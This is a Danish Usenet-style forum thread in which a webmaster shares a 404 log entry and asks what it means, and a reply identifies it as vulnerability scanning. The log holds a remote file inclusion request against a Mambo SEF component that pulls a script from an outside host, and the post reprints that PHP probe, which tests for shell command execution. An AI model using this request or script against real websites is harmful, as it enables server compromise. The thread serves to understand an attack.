/ Forside / Teknologi / Operativsystemer / BeOs / Nyhedsindlæg
Login
Glemt dit kodeord?
Brugernavn 

Kodeord  


Reklame
Top 10 brugere
BeOs
#NavnPoint
dk 1570
rpje 510
emesen 244
pallebhan.. 220
BjarneD 210
Nordsted1 200
dova 110
disken 100
Octon 100
10  klummen 100
XSS-forsøg - hvad betyder det for mig?
Fra : Christian R. Larsen


Dato : 27-11-07 11:33

Jeg er webmaster på et site, og har lavet en funktion, der sender mails til
mig, hver gang der registreres en 404.

Jeg ser nogle gange nogle requests, som er meget mystiske, fordi der er tale
om sider, som slet ikke findes. Hvordan vil I tolke det?

Min log indeholder følgende data om det seneste af disse hits:

REDIRECT_ERROR_NOTES:
HTTP_HOST: (mit site)
HTTP_REFERER:
HTTP_USER_AGENT: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US;
rv:1.8b4) Gecko/20050908 Firefox/1.4
HTTP_FROM:
REDIRECT_REQUEST_METHOD:
REDIRECT_STATUS: 404
REQUEST_URI:
//components/com_sef/sef.class.php?mosConfig_absolute_path=http://mbbm.interfree.it/Varie/phpmic_txt.txt?
QUERY_STRING:
REMOTE_ADDR: 209.205.39.25
REMOTE_PORT: 34324

Den pågældende txt-fil indeholder dette PHP-script:

<?php
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
$contrs=0;
}
else{
ini_restore("safe_mode");
ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
$contrs=0;}
else{
$contrs=1;
}}

if($contrs == 0){
echo("FUCKSAFEMODEOFFBYMIC22");
}else{
echo("FUCKSAFEMODEONBYMIC22");
}

function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;




 
 
Bjarke Andersen (27-11-2007)
Kommentar
Fra : Bjarke Andersen


Dato : 27-11-07 12:40

"Christian R. Larsen" <crlarsen@hotmail.com> crashed Echelon writing
news:474bf26b$0$90275$14726298@news.sunsite.dk:

> Jeg ser nogle gange nogle requests, som er meget mystiske, fordi der
> er tale om sider, som slet ikke findes. Hvordan vil I tolke det?

Scanning efter vulnerabilities.

Et håb om du kører et produkt/service, som er sårbar og afsender kan
udnytte.

--
Bjarke Andersen

Søg
Reklame
Statistik
Spørgsmål : 176694
Tips : 31918
Nyheder : 719565
Indlæg : 6403224
Brugere : 218746

Månedens bedste
Årets bedste
Sidste års bedste